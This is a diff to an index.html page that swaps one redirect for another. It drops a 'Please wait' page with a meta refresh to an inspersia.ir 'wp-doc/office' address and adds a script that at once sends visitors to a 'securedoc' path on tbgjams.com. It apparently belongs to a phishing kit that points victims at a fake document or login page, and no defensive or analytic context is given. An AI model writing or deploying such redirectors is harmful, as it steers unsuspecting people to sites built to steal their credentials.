--- a/index.html
+++ b/index.html
@@ -1,31 +1,9 @@
-<html>
 <head>
- <meta http-equiv="refresh" content="5;url= https://inspersia.ir/wp-doc/office/")>
-
-<title>Wait...</title>
-</head>
-<body style="height:100%;width:100%;margin:0;padding:0;top:0;bottom:0;background: url(./imgs/bg.png) repeat #EBEBEB;">
-<br><br><br><br><br><br><br>
-<center>
-<img src="../img/spinner.gif" width="60">
-<br><br>
-<p style="font-family: ProximaNova,Helvetica,Arial,sans-serif;font-size:22px;"><strong>Please wait......</strong></p>
-
-
+<title>Redirecting...</title>
+<script>
+window.location.href = "https://tbgjams.com/securedoc/";
+</script>
 </head>
 <body>
-
-</a>
-
-
-
-</div>
-</body>
-								</a>
-
-</div>
-
-</center>
-
 </body>
 </html>
